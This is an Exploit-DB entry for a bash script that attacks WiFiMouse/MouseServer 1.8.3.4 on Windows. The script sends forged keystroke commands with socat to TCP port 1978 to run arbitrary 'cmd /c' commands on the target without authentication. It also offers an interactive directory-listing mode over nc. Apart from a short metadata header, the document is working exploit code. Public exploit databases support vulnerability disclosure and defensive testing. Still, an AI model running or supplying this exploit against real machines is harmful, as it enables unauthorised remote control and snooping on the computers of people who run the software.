WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)

EDB-ID:

51016

CVE:

N/A




Platform:

Windows

Date:

2022-09-21


# Exploit Title: WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)
# Date: 15-08-2022
# Author: Febin
# Vendor Homepage: http://necta.us/
# Software Link: http://wifimouse.necta.us/#download
# Version: 1.8.3.4
# Tested on: Windows 10

#!/bin/bash
printf "
  WiFiMouse / MouseServer 1.8.3.4 Exploit
        
            by FEBIN

"

printf "[*] Enter the Target IP Address: "
read TARGET



rce(){
printf "[*] Enter the Command to execute on the Target:  "
read CMD

sh -c "echo 'key  9[R] WIN d';sleep 1;echo 'key  9[R] WIN u';sleep 1;echo 'utf8 cmd /c $CMD';sleep 1;echo 'key 9[R] RTN u'" | socat - TCP4:$TARGET:1978
}

dirlist(){

echo "[*] User's Home Directory Contents:"

echo 'fileexplorer ~/' | nc $TARGET 1978 | strings | cut -b 2-

while $true
do
printf "\nList Directory:> "
read DIR
echo "[+] Contents of $DIR: "
echo "fileexplorer ~/$DIR" | nc $TARGET 1978 | strings | cut -b 2-
done


}

printf "
 [1] Remote Command Execution
 [2] Directory Listing
 
 "
printf "Enter Your Choice (1 or 2) : "
read CHOICE

if [[ $CHOICE == "1" ]]
then
rce
elif [[ $CHOICE == "2" ]]
then
dirlist

else
echo "[-] Invalid Choice!"
fi